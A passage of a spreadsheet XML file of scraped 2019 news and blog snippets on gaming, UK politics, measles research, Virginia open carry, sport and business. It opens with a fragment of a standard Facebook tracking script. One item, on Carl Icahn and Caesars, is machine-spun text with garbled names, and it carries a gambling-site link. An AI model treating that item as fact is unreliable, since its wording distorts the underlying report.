n.callMethod.apply(n,arguments):n.queue.push(arguments) ; if (!f._fbq) f._fbq = n; n.push = n; n.loaded =! 0; n.version = ‘2.0’; n.queue = []; t = b.createElement(e); t.async =! 0; t.src = v; s = b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t, s); (window, document, ‘script’, ‘https://connect.facebook.net/en_US/fbevents.js’); fbq(‘init’, ‘1611373942516879’); fbq(‘track’, ‘PageView’); var fbendtime = new Date();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2019 Emmys Winners: The Complete List appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Road trip at bataan The post Road trip at bataan appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The emergence of Game Pass on Xbox One reminds us of the rise of the latest generation of PlayStation Plus. While the PlayStation 3 was competing for market share against Xbox 360, a very clever Sony has turned its subscription service into a secret weapon, offering games of great fame to its small group of subscribers. It weighed on consumers before making the service mandatory on the PlayStation 4, and it worked perfectly. Microsoft may be looking a little deeper than goodwill gestures. The above-mentioned initiative – which includes "free" copies of each new title for the first game, as well as selected third-party versions – is undoubtedly in a loss mode, since it offers $ 1 rebates in the hope to establish a base large enough to make a Netflix-esque model viable in the future. But is this something that PlayStation could copy realistically? Well, it is worth mentioning that the mechanisms of the model are not so difficult to implement. As you already know, the PlayStation Store is more than capable of managing subscriptions nowadays and Sony has a catalog of content that is attractive enough to make its own Game Pass version attractive. In fact, with the downloads offered by PlayStation Now, the game is already immersed in the ocean – although, obviously, you will not play the first day of Death Stranding via the service. This is the big difference that currently characterizes Microsoft's efforts: the group is ready to limit the sales of Gears 5 – which represents only a quarter of its underperforming predecessor at the UK retailer – in an attempt to attract subscribers. But is this something that Sony, with its catalog mainly based on a single player, could reproduce? And with PlayStation exclusives whose performance is better than in the past, does it make sense to change your tact? It is clearly too early to say. At the beginning of the Xbox Game Pass, we talked a lot about the model that increases sales at full price, and that's a good suggestion in some cases; A game like Rocket League, for example, would not have achieved half of its success without reaching critical mass via PlayStation Plus. But when it comes to a blockbuster like Halo: Infinite, it's hard to imagine that the same scenario will happen again. The same goes for Sony's catalog: would Marvel's Spider-Man really have established the type of sales record he had obtained if he was part of a discounted subscription service? The Japanese giant must look at how its titles are selling at full price, both at retail and on the PlayStation Store, and hesitate to virtually give them away. However, while it may limit revenue to big hits, it may be worth remembering that subscription models can also protect against failures. Our biggest concern is that if PlayStation adopts the Game Pass model and offers exclusives day after day, would that have an impact on the type of software that the company manufactures? The manufacturer has imposed itself as the master of single-player cinematic campaigns, but subscription models tend to favor high-retention titles, such as multiplayer games or even episodic versions. Our assumption is that Microsoft will use its new teams to create smaller titles that come out often. But we will have to see how things will be settled over the next few years. Microsoft will sell its next Xbox with the argument that a monthly subscription gives you access to all the content you need; theoretically, you do not even need to buy a single game. That's convincing and a threat to the status quo. In reality, nothing prevents Sony from joining the proposal, but at what price? This is what the holder of the platform will have to take into account when approaching the PlayStation 5. Do you think that a PlayStation game pass is viable? What sacrifices in Sony production would you be willing to accept to make it a success? Do not forget to sign up in the comments section below. .</t>
  </si>
  <si>
    <t>Korean Portuguese Dictionary – travel dictionary to translate Korean to Portuguese. Click on the list to show Korean or Portuguese synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Korean Portuguese Dictionary →</t>
  </si>
  <si>
    <t>DavidMunday815</t>
  </si>
  <si>
    <t>Mohamed Salah (£12.5m) has returned to the summit of captain consideration for Gameweek 7. However, the Liverpool midfielder ...</t>
  </si>
  <si>
    <t>California passed a new law making it illegal for schools to suspend disruptive students. What a ridiculous law! It doesn’t even guarantee them access to the school’s PA system. 1 0</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/9/5/20850679/microsoft-xcloud-sk-telecom-5g-cloud-gaming-streaming-partnership-korea Microsoft will test xCloud gaming over 5G in Korea Photo by Nick Statt / The Verge Microsoft is partnering up with SK Telecom to deliver its xCloud game streaming service over 5G in South Korea. The software giant is planning to start public previews of Project xCloud next month, and SK Telecom is now an “exclusive operating partner” of Microsoft’s cloud gaming service in Korea. 5G is a natural fit for services like xCloud, and once networks roll out worldwide with mmWave we should start to see some of the promises of latency reduction that will benefit cloud gaming services. Some SK Telecom customers will be able to try out xCloud game streaming next month, over both LTE and 5G networks. Microsoft is currently focusing on trialing phone-based versions of xCloud in October, but the company has not yet revealed exact… Continue reading… Source: https://www.theverge.com/2019/9/5/20850679/microsoft-xcloud-sk-telecom-5g-cloud-gaming-streaming-partnership-korea The post Microsoft will test xCloud gaming over 5G in Korea appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Episode 5: THE JERSEY TRIP 2019! The post Episode 5: THE JERSEY TRIP 2019! appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>ASTEROID expert and planetary scientist Megan Bruck Syal named the worrying threat to the planet that “keeps her awake at night”. The post Asteroid scientist exposes worrying threat that ‘keeps her awake’ at night appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Federal Resources Minister Matt Canavan has called on the Queensland government to immediately approve a controversial coal mine expansion to save workers' jobs.</t>
  </si>
  <si>
    <t>David Pratt</t>
  </si>
  <si>
    <t>by David Pratt, Virginia Justice Democrats and Indivisible Winchester This past Saturday morning, September 7, in Old Town Alexandria, a group of six men with loaded assault weapons and pistols walked a route that began at City Hall and took them up King Street and Union Street to Founder’s Park. They started around 9 a.m. and ended around 10 a.m. Their presence and route was shared with the police department in advance. At least one individual pictured in the photo walked through the Old Town Alexandria Farmer’s Market. A vendor called the police and witnesses saw police officers approach the man and talk to him as his female companion stood by wearing a t-shirt that reads “I’m the NRA in Virginia and I Vote.” “The law is the law. It’s not illegal,” said an Alexandria police-department spokesman. This is what “open carry” looks like in Virginia. Believe it or not, 26 states are like Virginia permitting “open carry.” Another six states allow it but with localities able to restrict it. Another 13 allow “open carry” with a license. Only five states, California, Illinois, New York, North Carolina and Florida as well as the District of Columbia do not allow “open carry.” The Dillon Rule Supersedes any Local Laws on Guns The “Dillon Rule” from 1868 prohibits local jurisdictions from adopting laws that are not specifically permitted in the state. This has prevented communities like Falls Church from preventing people from walking the streets or entering businesses with loaded guns. The Virginia State Police website offers a handy explainer on guns in Virginia. With the exception of machine guns, firearms are not registered in Virginia. A firearm may be carried openly in Virginia except where prohibited by statute. They point to two statutes, one about not maliciously discharging your weapon (18.2-279) and one (18.2-311.2) that says you might not be able to openly carry a gun after your third conviction for a firearms offense. That’s it folks. After Virginia Beach, After Virginia Tech at What Point Do we Feel Unsafe when a Man walks down the street with a loaded gun? I asked the Alexandria police department how they respond to the kind of calls they got Saturday morning when frightened vendors at the farmer’s market called the police. “We always take it seriously,” the spokesman said. However, the short answer is that Alexandria police respond right away, but they do not treat it as an emergency call. So no speeding to the scene with sirens flashing. “That has its own caveats. If it’s not an imminent threat we don’t want to endanger the public by racing through the streets,” the spokesman said. I asked how can they tell the difference between a call about a man walking down the street with an assault weapon because he/she wants to demonstrate their right to openly carry even assault weapons held at the ready in front of their body and the next mass shooter. “We depend on the caller to describe the demeanor.” I pointed out that mass shooters do not tend to shout threats or act erratic. Many of them calmly and purposefully walk up to a crowd before they start shooting. The Alexandria police spokesman again said that it isn’t illegal. In fact, officers will stand by and observe open carry fanatics, but won’t ask to see necessarily ask to see their I.D. because these guys are looking for an excuse to bait officers and claim that their civil rights have been violated. Eyewitness Account from the Farmer’s Market This was posted Sunday on Facebook and is being shared online now. I shared it myself and comments blew up. People are upset. Many are calling for the repeal of open carry in Virginia. A citizen who was at the farmer’s market during the incident said: “…As the day wore on I realized how upset and angry this made me, because some full-on verified asshat decided to exercise his 2nd Amendment Rights and open carry (not holster) a semi automatic weapon at the Old Town Alexandria Farmers Market this morning. “Surrounded by families, kids, unicorn costumes being sold for Halloween, entrepreneurs of all shapes, sizes and colors trying to make a living, pregnant women, grandparents, people in wheelchairs etc, this white male specimen and his posse (wife and daughter) were wearing NRA T-shirts trying to make a statement. At a farmers market on an early Saturday morning. What’s his message: Take my guns away and I’ll kill you?” I am sure people left the market feeling menaced, and I am sure it did not help business for farmers who operate on thin margins. Wouldn’t you quickly leave the market without making purchases if you felt threatened? The witness also shared what she asked the officer on the scene: “So if he starts shooting at people there is nothing you can do? “He said: ‘Oh yes we can arrest him for committing a crime.’ “And I said: ’And by then how many people will be dead?’ “He had no answer for that. “A lot of people were upset by the sight of this guy and tried to stay away from him. Because honestly, how can you know if he’s mentally stable or not, and going to fire off some rounds at any time? He fits the typical profile: White man with a gun. And btw, he wasn’t just carrying the AR-15 (?) he had a holstered 9mm Glock on his hip. Both guns fully loaded. “As he walked slowly through the market he made sure to walk in circles in the open areas which made me think… Isn’t that what gorillas do in the jungle to mark their territory? “At any point in time the truth of this situation today is that anyone could have been killed by this AWMWAG (Angry White Man with a Gun.)” Police confirmed that the weapons were all loaded. Are We Going to Let Gun Nuts Bully Us? Do you want to do something about this? Find your local chapter Moms Demand Action. Volunteer for candidates who promise to change our gun laws. Pressure our state delegates and senators to repeal open carry. Be like DC, California, Illinois, Florida, North Carolina, and New York that don’t allow it.</t>
  </si>
  <si>
    <t>Man City news and transfers LIVE reaction to shock Premier League defeat to Norwich Original Source Man City defeat at Norwich reveals a bigger problem than summer transfer failure Manchester City slumped to their first league defeat for nearly eight months in a huge shock at Carrow Road. And the manner of defeat called into question their one big transfer failure of the summer – not replacing departing skipper Vincent Kompany . A dreadful mistake by Nicolas Otamendi , but a generally dysfunctional display by the back four – with the returning John Stones looking rusty – was at the root of the defeat. The Blues pursued Harry Maguire but when they lost that fight with Manchester United, they had no Plan B – and it has come back to haunt them as Aymeric Laporte’s injury means they will have to cope for five or six months with their third and fourth choice centre backs from last season. Bright and determined Norwich were, quite simply, the better team, although Otamendi’s gaffe came just as Sergio Aguero ’s header seemed to have pave the way back into the game for the Blues. Read the full report here.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 City news and transfers LIVE reaction to shock Premier League defeat to Norwich appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Sam McClure</t>
  </si>
  <si>
    <t>Jeremy Finlayson is Greater Western Sydney's version of the forgotten forward. Sam McClure spoke to him.</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</si>
  <si>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Long Beach PD hosts drug take-back event by USA Consumer Credit Counseling, Felipe Escobar on Wednesday 11 September 2019 03:44 PM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Long Beach PD hosts drug take-back event Wednesday 11 September 2019 03:05 PM UTC-05 | Tags: consumer-credit-counseling-service https://m.youtube.com/watch?v=T1ChIWOVZ2M The Long Beach Police Department collected nearly 600 pounds of drugs at its drug take-back event. Tags: Fort Smith, Arkansas Consumer Credit Counseling Service | (888) 551-1270 via Long Beach PD hosts drug take-back event September 11, 2019 at 02:46PM Copyright © September 11, 2019 at 02:46PM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>Apple has shaken things up for its 2019 iPhones, with naming if nothing else. The iPhone 11 sounds like an upgrade to the iPhone XS. But this is really the successor to the iPhone XR, the most popular iPhone of the 2018/2019 range. The aim is to get away from the suggestion the iPhone 11 is in any way 'cheap', even though it comes at a substantially lower cost than the new iPhone Pro phones. Check out our thoughts on the iPhone 11 Read our in-depth review of the iPhone XS These are the best iPhones you can buy It may all be a trick of semantics, but will the iPhone 11 seem like a true upgrade over the iPhone XS? In many… TechRadar – All the latest technology news The post iPhone 11 vs iPhone XS: we compare the new, and the old, Apple flagships appeared first on Crosat - News from the entertainment and multimedia.</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</si>
  <si>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Lawsuit accuses unnamed LA elected official of sexually assaulting teen in 2007 by USA Consumer Credit Counseling, Felipe Escobar on Tuesday 17 September 2019 11:52 AM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Lawsuit accuses unnamed LA elected official of sexually assaulting teen in 2007 Tuesday 17 September 2019 10:54 AM UTC-05 | Tags: consumer-credit-counseling-service https://firmadeabogadosmedellin.blogspot.com/p/rancho-cucamonga-california-consumer.html An unnamed elected official who lives in Los Angeles was sued Friday by a woman who claims the man drugged and then fondled her during a golf outing in 2007, when she was 16 years old. Tags: Sugar Land, Texas Consumer Credit Counseling Service | (888) 551-1270 via Lawsuit accuses unnamed LA elected official of sexually assaulting teen in 2007 September 17, 2019 at 10:48AM Copyright © September 17, 2019 at 10:48AM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>Sam Gyimah becomes sixth MP to defect to Liberal Democrats this year Original Source Former Conservative minister and leadership contender Sam Gyimah took to the Liberal Democrat conference stage amid wild adulation as he confirmed he had become the sixth MP to defect this year. Rumours had swirled since Friday that the Lib Dems were gearing up for a big announcement at the party conference in Bournemouth. Leader Jo Swinson kept members waiting until well into the evening on the first day to reveal that Mr Gyimah – a former aide to David Cameron when he was prime minister – had become a Lib Dem MP. Mr Gyimah, who represents East Surrey, sat as an Independent after losing the Tory whip when he backed a move by opposition parties to prevent a no-deal Brexit earlier this month. He has been a prominent advocate of a second referendum and was briefly in the race to replace Theresa May as Conservative leader in June. The former universities minister told the packed Bournemouth International Centre on Saturday that he had “not taken this decision to be here lightly” but that the Brexit fallout had convinced him to join Mrs Swinson’s party. Sam Gyimah speaking during the Lib Dems autumn conference (Jonathan Brady/PA) He resigned from the frontbench in November over the terms of Theresa May’s Withdrawal Agreement and has been a vocal critic of the deal since, telling Lib Dem members it was “the worst of all worlds”. Mr Gyimah said he had initially asked Mrs Swinson whether she would stand down the Lib Dem candidate in his constituency to allow him to stand as the sole independent Remainer but she declined. Referring to her response as “feisty”, he said: “She looked me dead in the eye and said, ‘Sam, I’m in the business of creating Lib Dem MPs and not finding a way back for Conservative MPs’.” The Ghana-raised politician said he had joined the party to fight for “liberal values”. “We cannot perceive that our institutions and democracy are immune from populism and nationalism that has tainted other democracies,” he said. “The Liberal Democrats have a unique opportunity to make sure that we fight to defend these values and create a new force in British politics.” Wearing orange trousers to match his new party’s colour, Mr Gyimah was heavily critical of Prime Minister Boris Johnson’s approach to securing a Brexit deal. He said he believed the PM had left himself no option but to pursue a no-deal exit. “There is now no orderly way for the UK to leave the EU on October 31,” he said. Mr Gyimah scolded the PM for “playing fast and loose with our constitution” in the way he had hinted he might not obey the Benn Bill – the law passed last week that demands a Brexit extension until 2020 is sought if no withdrawal agreement is in place by October 19. European Parliament’s Brexit co-ordinator Guy Verhofstadt during the Liberal Democrats autumn conference at the Bournemouth International Centre in Bournemouth (Jonathan Brady/PA) “Essentially, a government that has made law enforcement the centre-piece of its programme, more police officers to make sure its citizens obey the law, is saying to us it will pick and choose which laws it respects – that is incredibly dangerous,” he said. “When you are playing fast and loose with our constitution, when you are playing fast and loose with people’s livelihoods, when you are playing fast and loose with people’s security, I think it is right that we all stand up. “But when people stand up, you’re called collaborators. You’re called saboteurs. You’re called mutineers. Something has gone wrong.” He accused both Mr Johnson and Labour leader Jeremy Corbyn of presiding over “intolerant” political parties. Mr Gyimah follows both Dr Philip Lee and Dr Sarah Wollaston in having switched from Tory allegiance to the Lib Dems. Ex-Labour MPs Luciana Berger, Chuka Umunna and Angela Smith have also joined since January.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Sam Gyimah becomes sixth MP to defect to Liberal Democrats this year appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Caden Helmers</t>
  </si>
  <si>
    <t>Their final tune-up was a dream - now Sandy Brondello's Opals side will set their sights on a gold medal.</t>
  </si>
  <si>
    <t>Carl Icahn Reportedly Building Stake throughout Caesars The billionaire investor will be reportedly developing a stake throughout Caesars not more than a year right after he offered Tropicana Enjoyment New York billionaire activist opportunist Carl Icahn is subtly building a risk in Sin city casino and also hospitality large Caesars Amusement Corp., CNBC’s David Faber reported at Friday, citing sources accustomed to the matter. It can be still anonymous how large Mr. Icahn’s stake is and what his ideas about Caesars involve. Nor the business person, nor the actual gaming firm have left a comment on the reviews since people surfaced last week. The billionaire investor isn’t a stranger to the US land-based casino scene. In ’08, he procured gaming as well as hospitality provider Tropicana Leisure. He at some point unloaded this holding inside Tropicana latter spring on a $1. 85 billion deal in which saw Eldorado Resorts and real estate investment trust Gaming together with Leisure Properties pick up 6-8 of the company’s eight internet casinos, including the marquee building Tropicana Modern casino &amp; Destination Atlantic Location. In the new season of 2017, Mr. Icahn sold the particular then shuttered Trump Taj Mahal , another Atlantic City Boardwalk property, towards Hard Natural stone International. Typically the Florida-based gambling and food company substituted the resort’s iconic minarets with guitars and other rock’n'roll memorabilia and also reopened that last summer time as Tricky Rock Motel &amp; Casino Atlantic City. Tilman Fertitta Still Eying Caesars Reviews about Mr.. Icahn building a stake on Caesars come about just a few a few months after the game company rejected a takeover offer that is generated by billionaire betting house owner Tilman Fertitta . Back in August, Mr. Fertitta approached Caesars with a bid that prized the company at $13 each share. The actual merger option would have witnessed an alternate of store in Mr. Fertitta’s food company Landry’s for gives you in the online casino giant. Some sort of later dutch tender with between $2 billion and even $3 billion dollars would have provided with Caesars investors an option to promote, people aware of the matter shown back then. Within other organisations, Landry’s incorporates Golden Kangaroo Casinos, Morton’s steakhouses, and also Bubba Gump Shrimp. Them emerged which Mr. Fertitta’s plans involved adding various of his eating venue brands from Caesars destinations. The business person would have happen to be CEO along with Chairman within the combined business as well as a largest shareholder, according to sources. As mentioned previous, Caesars rejected the bid, nonetheless sources well-versed in Mr. Fertitta’s business designs believe he is still engaged in https://www.aussie-pokies.club/ the game powerhouse. Reported by a separate coup of stories from the later part of last year, Caesars and MGM Resorts International, another important Las Vegas gaming and hospitality company, would get engaged in merging talks . Those stories were instantly dismissed since untrue for a deal between two agencies would have proficiently created a accommodation monopoly with Las Vegas along with Atlantic Urban center, something the actual Federal Industry Commission could possibly not required go-ahead for you to. No Relation to Backdoor Indexing Plan Inside statement with Monday, Very easy Entertainment as well pointed out that the ongoing legal fight between Mister. Okada in addition to Tiger Vacation resort would have certainly no impact on their plans towards backdoor number Okada Manila through the acquisition of a displayed company. Tiger woods Resort has revealed propose to list it has the Philippine surgery on the community Stock Exchange in the purchase of dispenses of Asiabest Group Foreign Inc. The exact casino firm will pay about PHP650 mil to acquire stocks in Asiabest through Wagering action Resort Okazaki, japan Limited. Last December, the particular Philippine Sec and Alternate Commission required Tiger Location Asia to submit a changed tender provide you with for Asiabest that would include information about the continuing dispute together with Mr. Okada . Often the order appeared to be issued after a minority Asiabest shareholder previously had filed a complaint by using SEC, reasoning that Tiger Resort Asian countries should have unveiled information about the legal battle with japan businessman and seeking eliminate and abstain actions.</t>
  </si>
  <si>
    <t>Pakistan’s tourism scene is about to explode, thanks to the power of positive social media… but is that a good thing? This talk was originally meant to be given at the controversial Pakistan Tourism Summit 2019 in Islamabad, but was cut out by the organizers once they realized its critical nature. Let’s see if the […] The post Why travel media is dangerous for Pakistan's tourism appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Sandra Hall</t>
  </si>
  <si>
    <t>Our critics reviewed six movies released this week. So which ones are worth the price of entry?</t>
  </si>
  <si>
    <t>TopMarx - H2H L4 D5</t>
  </si>
  <si>
    <t>The best FPL Gameweek 7 transfers, captain and strategy tips from Fantasy Football Scout</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/9/9/20856585/focos-2-0-hands-on-portrait-mode-blur-any-photo Focos 2.0 turns any photo into a ‘portrait’ A new update to Focos lets you turn any photo into a “portrait mode”-style image with fully adjustable depth of field, no matter what kind of camera you took it with. It’s not quite magic, but it is pretty cool. Focos has long been one of the most ambitious photo-editing apps on iOS, giving you control over the depth map generated by dual-camera iPhones in portrait mode. You can adjust aperture, simulate different styles of bokeh from various lenses, choose different points of focus, and so on. For example, here’s a picture of our bunny shot in portrait mode on an iPhone 8 Plus: And here it is in Focos, where you’re able to view the depth map from another angle and actually add a virtual bulb in 3D space to provide… Continue reading… Source: https://www.theverge.com/2019/9/9/20856585/focos-2-0-hands-on-portrait-mode-blur-any-photo The post Focos 2.0 turns any photo into a ‘portrait’ appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Measles ‘leaves children vulnerable to other serious infections’ Original Source Children who catch measles are more vulnerable to other serious infections for the next two to three years, experts have warned. Scientists believe the disease, which is seeing a resurgence across the UK, wipes out a child’s immunity to other illnesses. After surviving measles, children may fall ill or die from other infections which they previously had immunity to, they said. The findings would help explain the mysterious large drops in mortality of up to 50% following the introduction of measles vaccinations, the researchers said. Prior to vaccines, measles was usually associated with much less than 50% of childhood deaths. Assistant Professor Michael Mina, from Harvard Medical School in Boston, who led the new research, told the PA news agency that unvaccinated children who got measles were at greater risk from a range of potentially deadly infections such as pneumococcal infections, which include meningitis, septicaemia and pneumonia, serious respiratory viruses and a range of bacterial pathogens. He added: “With the hypothesis that we have – which we believe is true – measles would cause this amnesia in your immune system that would affect your whole immune response. “Measles takes somebody’s more mature immune response and it brings them back a few years – it brings them back to a more naive immunological state. “When you get those infections, they might not be worse than the first time you got them, but it’s like resetting your immune system so it thinks it has not seen this pathogen before. “Children are the most vulnerable in the first few years of life because their system hasn’t had the opportunity yet to develop memory of what is a danger and what is not a danger. “It could be like repeating the first few years of life again when looking at some of these pathogens.” Dr Mina said measles was like a “master infection”. “Even if you get all the other vaccines but not MMR, if the child gets measles it could negate the effect of some of those vaccines, such as diptheria, pertussis (whooping cough), rotavirus or the pneumococcal vaccine. “Vaccines are like accelerated educations for the immune system. “You can take a 1.5 year old and give them lessons about all these pathogens which, previous to vaccines, they would have slowly got exposed to at their own peril. “It’s so important to vaccinate children.” The research comes after the UK lost its “measles-free” status due to a rise in the number of cases being seen across the country. Prime Minister Boris Johnson has called for health leaders to renew their efforts to ensure 95% of the population have had both doses of the MMR vaccine. A measles vaccination kit (Owen Humphreys/PA) The Government is concerned about the rise of anti-vaccination messages on social media and their influence on parents who go on to shun vaccines. Currently only 87.2% of children have had the second dose of the jab, down from a high of 88.6% in 2014-15. There were 532 confirmed cases of measles in the UK during the first six months of 2019, and more than 2,400 cases from January 2016 to June 2019. Across the globe in 2018, measles killed about one in every 75 infected children, leading to more than 100,000 deaths. Professor Mina will present his findings at the European Society of Clinical Microbiology and Infectious Diseases (ESCMID) vaccine conference in Bilbao, Spain. His team’s observations have been backed by numerous studies which show that the measles virus infects a large proportion of the “memory cells” of the immune system. This results in so called “immune-amnesia”, which means the immune system cannot remember some of the diseases it has fought in the past. This leaves children exposed to the risk of re-infection with such diseases. A UK study on more than 2,200 children with measles found they were 24% more likely to need antibiotics in the five years after suffering measles than children who never had the disease. They were also more likely to suffer a range of infections, including chest infections, viral illnesses and tonsillitis. Dr Jamie Lopez Bernal, consultant epidemiologist for immunisation at Public Health England, said: “These findings only add to the evidence of the phenomenal impact of vaccination programmes. “No other medical intervention has been as important in the last 50 years. “UK measles vaccination has prevented 20 million cases and 4,500 deaths – and that’s not taking into account the potential other benefits. “This is about not only protecting ourselves but protecting each other. “Vaccines stop the spread of disease and save lives.” Helen Johnson, from the European Centre for Disease Prevention and Control, said: “It is tragic and unacceptable that children and adults continue to die from complications of measles, when safe and effective vaccines are readily available.”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Measles ‘leaves children vulnerable to other serious infections’ appeared first on Sky-News. Source link</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</si>
  <si>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Personal Finance: 3 Things to Do if You're in Your 50s With No Retirement Savings by USA Consumer Credit Counseling, Felipe Escobar on Sunday 08 September 2019 10:25 AM UTC-05 Personal Finance 3 Things to Do if You're in Your 50s With No Retirement Savings Sunday 08 September 2019 06:03 AM UTC-05 But if you've reached your 50s and have no money at all in a dedicated retirement savings plan, consider it a wake-up call to start doing better.</t>
  </si>
  <si>
    <t>How to stream the Serie A match between AC Milan and Inter Milan online. Source: Sports Business News</t>
  </si>
  <si>
    <t>Kimberly Davidson</t>
  </si>
  <si>
    <t>The company's website stating it is cutting lumber production at its mills in Armstrong and Williams lake by 20 per cent.</t>
  </si>
  <si>
    <t>Apple will launch a legal challenge on Tuesday to a European Commission order to pay 13 billion euros ($14.4 billion) in Irish back taxes in a landmark case in the EU's crackdown on tax avoidance by multinational companies.</t>
  </si>
  <si>
    <t>Spanish Lao Dictionary – travel dictionary to translate Spanish to Lao. Click on the list to show Spanish or Lao synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Spanish Lao Dictionary →</t>
  </si>
  <si>
    <t>Doyle Potenteau</t>
  </si>
  <si>
    <t>The Selkirk Spreader, designed in 1931, will be craned into the museum’s rolling stock display area.</t>
  </si>
  <si>
    <t>Our Readers</t>
  </si>
  <si>
    <t>In response to The Conservative Woman: The Big Climate Change Quiz (teachers welcome), Inspector General wrote: One is reminded of the historical happening that was the Children’s Crusade, the event most likely to have inspired The Pied Piper of Hamelin. Thoroughly brainwashed to believe that they, and only they, could rescue the Holy Land from the Saracen, off they went . . . Few made it back. Some, who were too weak or lame to go stayed behind. They get a mention in the fable. The ones that made it to the coast tried to negotiate passage across the sea, but were enslaved by their delighted sea-going captors, who took them home to (Islamic) North Africa where their descendants can be found today. We won’t dwell on what cruelties awaited the children, but it must have been bloody awful for them . . . The post Reader’s comment: The Green Piper of Hamelin appeared first on The Conservative Woman. The post Reader’s comment: The Green Piper of Hamelin appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>WeWork owner The We Company is weighing slashing the valuation of its forthcoming IPO to below $20 billion, two sources said, in the latest headwind for leading shareholder SoftBank Group whose key group portfolio firms have tumbled in value.</t>
  </si>
  <si>
    <t>Sponsored Content Manager</t>
  </si>
  <si>
    <t>The GOODS from Strange Fellows Brewing Vancouver, BC | We have a new beer release coming up available on tap on Sep 21st at our tasting room – Jukefest Beer. This beer has been created as a collaboration with Juke Fried Chicken and we will have a release party happening at Juke Fried Chicken on October 1st at their Keefer St location. I have attached some images of the beer and a poster for the release party. Please let me know if you have any questions. Beer info: Jukefestbier (Jukefest Beer) Beer Type: German style Festbier Aroma: Malty with delicate toasty sweetness and floral hop aroma. Character: Clean and smooth with classic elegant malt character Colour: Deep golden Hops: German Hallertau Tradition Malt: Weyermann floor malted Pilsner malt Yeast: S189 Pairing: Fried Chicken Alcohol: 5.4% IBU: 25 OG: 1.054 Fester is a very traditional German style made for the Bavarian Oktoberfest celebrations. In keeping with custom and quality we’ve brewed with German imported floor malted grains and continental Hallertau Tradition hops. The result is an exceptionally clean and smooth beer with a classic elegant malt character and floral hop finish. Strange Fellows Brewing Neighbourhood: East Vancouver 1345 Clark Dr. | 604-215-0092 | WEBSITE Strange Fellows Beer Set to Release New Jukefest Beer Beer Brief Vol. 26 Release Party info: BAWKTOBEERFEST: AN OKTOBERFEST CELEBRATION Tuesday, October 1 | 5 to 9 p.m. $20 per person advance/$25 at the door On Tuesday, October 1, Juke will put its own spin on the annual German-themed beer-and-food fest by hosting a ‘Bawktobeerfest’ celebration in collaboration with Strange Fellows Brewing. The one-night-only extravaganza will feature a Strange Fellows tap takeover with a ‘Jukefest’ Lager brewed especially for the occasion in addition to schnitzel ‘double down’ sandwiches, Juke-brats sausages and more available for one night only. A limited number of tickets to the event, which includes a frosty pint of the feature Jukefest Lager and snacks throughout the night, are available for $20 per person at jukefriedchicken.com/bawktobeerfest. Tickets will also be available at the door on the night of the event for $25 each. Juke Fried Chicken Neighbourhood: Chinatown 182 Keefer St. | 604-336-5853 | WEBSITE Strange Fellows Beer Set to Release New Jukefest Beer Six Vancouver Bars Invite All to Take Flight On a Paper Plane for the Amazon</t>
  </si>
  <si>
    <t>New Wave Foods’ plant-based shrimp Source: New Wave Foods After selling its stake in Beyond Meat in the spring, Tyson Foods’ next bet is on plant-based shellfish. Tyson Ventures, the venture capital arm of the meat processing company, is investing in New Wave Foods. Tyson Ventures CFO Tom Mastrobuoni declined to discuss the financial terms of deal but said that Tyson took a minority stake of less than 20% in New Wave. The start-up, which was founded in 2015, makes plant-based shrimp from seaweed, soy protein and natural flavors. “I tasted it for the first time in a cafe in Palo Alto, and I had no idea I was eating plant-based shrimp,” Mastrobuoni said. After shrimp, New Wave is planning to tackle crab and lobster. Shrimp is the most consumed seafood in the world, according to co-founder and Chief Technology Officer Michelle Wolf. “From a business perspective, it made sense because of the market opportunity,” Wolf said. While there are a number of companies tackling plant-based fish like salmon or tuna alternatives, New Wave is one of the few trying to sell crustacean substitutes. Mastrobuoni said that the lack of competition made New Wave a more attractive investment. Tyson will leverage its scale and network to help accelerate New Wave’s growth. “We’ve said this all along — alternative protein is an ‘and’ concept for Tyson, it’s not an ‘or,’ ” Mastrobuoni said. For now, New Wave Foods’ distribution is limited to three food-service locations rather than restaurants. CEO Mary McGovern said the company plans to target food service first, in part because 80% of shrimp consumption in the U.S. happens outside the home. New Wave is Tyson Ventures’ ninth investment since starting the fund in 2016. Mastrobuoni declined to disclose any track record of the fund’s performance. Before Beyond Meat went public in May, Tyson sold its stake in the company as it prepared to launch its own plant-based meat products, including imitation chicken nuggets. Since Beyond Meat’s initial public offering, the stock has soared 554%. Tyson is far from the only Big Food company with its own venture arm. Kellogg, General Mills, Kraft Heinz and Campbell Soup have their own investment funds. Tyson isn’t the only traditional food company branching out into plant-based foods. Hormel and Kellogg announced plans Wednesday to produce plant-based meat brands. Source link</t>
  </si>
  <si>
    <t>EMMERDALE resident Moira Barton could find herself on the receiving end of a fist or two in upcoming weeks as fans predict she will be the victim of a brutal attack. But who is out for revenge? Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Roger Federer took a rare medical timeout in his US Open quarter-final against Grigor Dimitrov moments after losing the fourth set. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>Israa Ghrayeb had been beaten to death, according to the West Bank’s chief prosecutor. The post Israa Ghrayeb: Murder charges for Palestinian ‘honour killing’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>LeBron James, Anthony Davis, James Harden and Jimmy Butler all expressed interest this week in playing for Team USA at the 2020 Tokyo Olympics. Source: Sports Business News</t>
  </si>
  <si>
